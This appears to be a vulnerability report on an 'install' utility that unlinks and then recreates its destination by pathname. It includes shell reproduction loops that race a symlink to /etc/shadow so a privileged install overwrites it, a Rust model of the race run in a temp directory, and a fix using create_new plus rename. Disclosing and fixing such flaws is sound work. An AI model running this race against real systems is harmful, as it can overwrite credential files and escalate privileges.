Component
install
Description
The install utility unlinks the destination file and then recreates it by pathname.
The code never uses exclusive create semantics (O_EXCL / create_new). After deciding what to install, it reopens the destination by name, trusting that the unlinked path has not been replaced in the meantime.
Test / Reproduction Steps
# Terminal 1: privileged install loop
while true; do sudo install source.txt /tmp/attacker-writable/target; done
# Terminal 2: attacker racing to plant symlink
while true; do rm -f /tmp/attacker-writable/target; ln -s /etc/shadow /tmp/attacker-writable/target; done
# On success: /etc/shadow gets overwritten with source.txt contents
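To make the unlink-then-reopen pattern from the description concrete, the following is an added Rust model (not code from the install implementation under report) that replays the race deterministically and contrasts plain create+truncate with the O_EXCL / create_new variant the report says is missing. The temporary directory, the file names `protected` and `target`, and the `in_window` hook that stands in for the attacker's loop are all constructed for this demonstration.

```rust
use std::fs::{self, OpenOptions};
use std::io::{self, ErrorKind, Write};
use std::os::unix::fs::symlink;
use std::path::Path;

/// Model of the reported pattern: unlink `dest`, then reopen it *by pathname*.
/// `in_window` stands in for whatever happens between the two steps (the
/// attacker's `rm -f` / `ln -s` loop in the report). Plain create+truncate
/// follows a symlink planted there; `create_new` (O_CREAT|O_EXCL) instead fails
/// with AlreadyExists if anything, symlink included, now occupies `dest`.
fn install(dest: &Path, data: &[u8], exclusive: bool, in_window: impl FnOnce()) -> io::Result<()> {
    let _ = fs::remove_file(dest); // step 1: unlink the old destination
    in_window();                   // the race window
    let mut opts = OpenOptions::new();
    opts.write(true);
    if exclusive {
        opts.create_new(true);
    } else {
        opts.create(true).truncate(true);
    }
    let mut f = opts.open(dest)?; // step 2: recreate by name
    f.write_all(data)
}

/// Deterministic replay of the race in a private temp dir. `protected` stands in
/// for /etc/shadow. Returns the protected file's contents afterwards plus the
/// error kind the installer saw, if any.
fn run_scenario(exclusive: bool) -> io::Result<(String, Option<ErrorKind>)> {
    let dir = std::env::temp_dir().join(format!("install-race-{}-{}", std::process::id(), exclusive));
    let _ = fs::remove_dir_all(&dir);
    fs::create_dir_all(&dir)?;
    let protected = dir.join("protected");
    let target = dir.join("target");
    fs::write(&protected, b"original")?;
    fs::write(&target, b"stale")?; // pre-existing destination that install unlinks
    let outcome = install(&target, b"payload", exclusive, || {
        // attacker wins the race: plant a symlink where the destination was
        symlink(&protected, &target).expect("plant symlink");
    });
    let after = fs::read_to_string(&protected)?;
    let _ = fs::remove_dir_all(&dir);
    Ok((after, outcome.err().map(|e| e.kind())))
}

fn main() -> io::Result<()> {
    println!("create+truncate : {:?}", run_scenario(false)?);
    println!("create_new      : {:?}", run_scenario(true)?);
    Ok(())
}
```

create_new turns a won race into a failed install rather than a redirected write; the usual complete fix is to create_new a temporary name in the destination directory and rename() it over the target, so the symlink can never be followed and the install still completes.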